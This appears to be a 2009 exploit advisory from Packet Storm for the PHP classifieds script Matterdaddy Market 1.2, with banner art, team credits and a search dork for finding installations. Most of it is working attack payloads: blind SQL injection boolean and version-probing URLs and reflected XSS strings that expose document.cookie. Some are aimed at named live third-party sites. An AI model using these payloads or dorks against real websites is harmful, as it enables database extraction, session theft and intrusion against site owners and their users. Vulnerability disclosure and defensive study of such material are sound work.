Matterdaddy Market 1.2 SQL Injection / XSS

2009-07-28T00:00:00
ID PACKETSTORM:79744
Type packetstorm
Reporter Moudi
Modified 2009-07-28T00:00:00

Description

                                        
                                            `###########################################################################  
#-----------------------------I AM MUSLIM !!------------------------------#  
###########################################################################  
  
==============================================================================  
_ _ _ _ _ _   
/ \ | | | | / \ | | | |  
/ _ \ | | | | / _ \ | |_| |  
/ ___ \ | |___ | |___ / ___ \ | _ |  
IN THE NAME OF /_/ \_\ |_____| |_____| /_/ \_\ |_| |_|  
  
  
==============================================================================  
[»] [!] Coder - Developer HTML / CSS / PHP / Vb6 . [!]  
==============================================================================  
[»] Matterdaddy Market 1.2 (bSQL/XSS) Multiple Remote Vulnerabilities  
==============================================================================  
  
[»] Script: [ Matterdaddy Market 1.2 ]  
[»] Language: [ PHP ]  
[»] Download: [ http://www.matterdaddy.com/ ]  
[»] Founder: [ Moudi <m0udi@9.cn> ]  
[»] Thanks to: [ MiZoZ , ZuKa , str0ke , 599em Man , Security-Shell ...]  
[»] Team: [ EvilWay ]  
[»] Dork: [ powered by matterdaddy market ]  
[»] Price: [ FREE ]  
[»] Site : [ https://security-shell.ws/forum.php ]  
  
###########################################################################  
  
===[ Exploit + LIVE : BLIND SQL INJECTION vulnerability ]===   
  
[»] http://www.site.com/patch/index.php?category=[BLIND]  
  
[»] http://www.motofrance.com/annonces-motos/index.php?category=19+and+1=1 <= TRUE  
[»] http://www.motofrance.com/annonces-motos/index.php?category=19+and+1=2 <= FALSE  
  
[»] http://www.motofrance.com/annonces-motos/index.php?category=19+AND SUBSTRING(@@version,1,1)=5  
=> TRUE  
[»] http://www.motofrance.com/annonces-motos/index.php?category=19+AND SUBSTRING(@@version,1,1)=4  
=> FALSE  
  
===[ Exploit XSS + LIVE : vulnerability ]===  
  
[»] http://www.site.com/patch/index.php?q=[XSS]  
[»] http://www.site.com/patch/admin/login.php?msg=[XSS]  
  
[»] http://www.matterdaddy.com/market_test/index.php?q="><script>alert(document.cookie);</script>  
[»] http://www.matterdaddy.com/market_test/admin/login.php?msg="><script>alert(document.cookie);</script>  
  
Those version are also vulnerable:  
  
* Version 1.2   
* Version 1.1  
* Version 1.051  
* Version 1.04  
* Version 1.03  
  
Author: Moudi  
  
###########################################################################`